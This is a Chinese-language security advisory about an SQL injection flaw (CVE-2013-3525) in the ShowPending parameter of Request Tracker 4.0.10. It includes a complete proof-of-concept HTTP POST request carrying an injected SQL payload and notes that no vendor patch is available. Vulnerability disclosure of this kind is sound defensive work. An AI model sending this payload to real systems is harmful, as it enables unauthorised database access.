首页 -> 安全研究

安全研究

安全漏洞
Request Tracker 'ShowPending'参数SQL注入漏洞

发布日期:2013-04-11
更新日期:2013-04-12

受影响系统:
bestpractical RT 4.0.10
描述:
BUGTRAQ  ID: 59022
CVE(CAN) ID: CVE-2013-3525

Request Tracker是Request Tracker问题跟踪系统,用于bug跟踪、客户服务、工作流处理、更改管理、网络操作、青年辅导等。

RT 4.0.10易于受到SQL注入漏洞的攻击,成功利用后可允许攻击者执行未授权数据库操作。

<*来源:cheki
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

POST /Approvals/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Cookie: RT_SID_example.com.80=7c120854a0726239b379557f024cc1cb
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.example.com/Approvals/
Host: 10.10.10.70
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;
Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 120

ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter=

建议:
厂商补丁:

bestpractical
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.bestpractical.com/rt/

浏览次数:4160
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障